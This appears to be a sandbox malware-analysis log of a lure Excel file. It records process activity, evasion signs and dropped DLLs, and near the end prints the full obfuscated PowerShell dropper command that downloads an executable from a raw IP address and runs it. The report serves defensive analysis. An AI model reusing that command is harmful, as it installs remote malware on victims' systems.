    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Thermo Fisher RFQ_TFS-1805.xlsStream path 'Workbook' entropy: 7.99937475846 (max. 8.0)
    Source: ~DF8BC8A5344F5550C8.TMP.0.drStream path 'Workbook' entropy: 7.99937475846 (max. 8.0)

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeRDTSC instruction interceptor: First address: 4C0A47F second address: 4C0A47F instructions: 0x00000000 rdtsc 0x00000002 cmp esi, 003D8B4Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007FFAF8E86B32h 0x0000000c inc ebp 0x0000000d cmp ch, bh 0x0000000f inc ebx 0x00000010 rdtsc
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6719Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3234Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1193
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1656
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\nsDialogs.dllJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\UserInfo.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\nsExec.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\UserInfo.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\LangDLL.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\LangDLL.dllJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\nsExec.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\nsDialogs.dllJump to dropped file
    Source: C:\Windows\System32\mshta.exe TID: 3776Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 6719 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 3234 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\mshta.exe TID: 3176Thread sleep time: -420000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep count: 1193 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep count: 1656 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2776Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1384Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405C60
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_00402930 FindFirstFileW,11_2_00402930
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_004068B1 FindFirstFileW,FindClose,11_2_004068B1
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 20_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_00405C60
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 20_2_00402930 FindFirstFileW,20_2_00402930
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 20_2_004068B1 FindFirstFileW,FindClose,20_2_004068B1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeAPI call chain: ExitProcess graph end nodegraph_11-4748
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeAPI call chain: ExitProcess graph end nodegraph_11-4756
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeAPI call chain: ExitProcess graph end nodegraph_20-4748
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeAPI call chain: ExitProcess graph end nodegraph_20-4751
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_729F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,11_2_729F1BFF
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline"Jump to behavior
